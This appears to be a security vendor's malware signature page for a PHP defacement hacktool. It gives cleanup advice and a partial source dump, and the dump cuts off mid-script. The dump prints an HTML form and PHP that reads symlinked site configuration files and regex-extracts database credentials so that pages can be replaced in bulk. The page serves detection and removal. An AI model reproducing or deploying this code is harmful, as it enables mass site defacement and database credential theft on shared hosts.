Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.defaced.script.003

php.defaced.script.003

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This tool aims to automatically deface webpages once uploaded to the website and executed.

Cleanup

Cleanup is done by deleting the malicious file. The infection can be found in your system by searching for parts of the dump below inside your site's files.
You can also sign up with us and let our team remove the malware for you.

Dump

<body bgcolor="black">
<center>
<pre>
__ __ __ __ _____ __
/ / | / | | __ / _|
/ / / __ | / | __ _ ___ ___ | | | | ___| |_ __ _ ___ ___
/ / / '_ | |/| |/ _` / __/ __| | | | |/ _ _/ _` |/ __/ _
/ /| |_) | | | | | (_| __ __ | |__| | __/ || (_| | (_| __/
/ / | .__/ |_| |_|__,_|___/___/ |_____/ ___|_| __,_|______|
| |
|_|
</pre>
</center>
<form method="POST" action="" >
<center>
<table border='1'><tr><td>List of All Symlink</td><td>
<input type="text" name="url" size="100" value="list.txt"></td></tr>
<tr><td>Index</td><td>
<textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
<br><br><input type="Submit" name="Submit" value="Submit">
<input type="hidden" name="action" value="1"></form>
</center>
<?
set_time_limit(0);
if ($_POST['action']=='1'){
$url=$_POST['url'];
$users=@file($url);

if (count($users)<1) exit("<h1>No config found</h1>");
foreach ($users as $user) {
$user1=trim($user);
$code=file_get_contents2($user1);
preg_match_all('|define.*(.*'DB_NAME'.*,.*'(.*)'.*).*;|isU',$code,$b1);
$db=$b1[1][0];